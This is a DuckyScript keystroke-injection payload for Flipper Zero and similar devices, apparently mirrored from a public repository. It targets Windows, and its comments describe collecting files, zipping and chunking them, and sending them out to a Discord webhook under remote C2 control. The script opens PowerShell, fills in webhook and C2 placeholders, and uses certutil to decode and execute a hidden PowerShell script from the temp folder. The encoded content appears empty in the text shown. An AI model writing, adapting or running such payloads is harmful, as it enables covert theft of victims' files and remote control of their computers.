mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-31 10:50:17 +00:00
30 lines
15 KiB
Plaintext
30 lines
15 KiB
Plaintext
REM Title: C2 Data Exfiltration with File Splitter w Discord Webhook
|
|
REM Description: Finds all specified filetypes and zips them into a file and sends
|
|
REM to Discord Webhook. If the zip file is too large, split and send in chunks.
|
|
REM Supports 7zip filecombining. C2 is used to IDLE and ACTIVATE and KILL the
|
|
REM payload remotely. C2 File must be hosted on GitHub unless you know how to
|
|
REM modify the source. UberGuidoz and REDD (InfoSecREDD) are NOT responsible for
|
|
REM the misuse of this payload.
|
|
REM AUTHOR: InfoSecREDD
|
|
REM Version: 1.4.2
|
|
REM Category: Exfiltration (REMOTE)
|
|
REM Compatibility: Flipper Zero AND DuckyScript Devices
|
|
REM Target: Windows
|
|
|
|
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
|
|
REM DUCKY_LANG US
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell
|
|
ENTER
|
|
DELAY 2000
|
|
REM Put your webhook below.
|
|
STRING $webhook = "DiscordWebhookHere";
|
|
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
|
|
STRING $ccontrol = "C2FileHere";
|
|
REM Put it all together now..
|
|
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo  > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
|
|
DELAY 1000
|
|
ENTER
|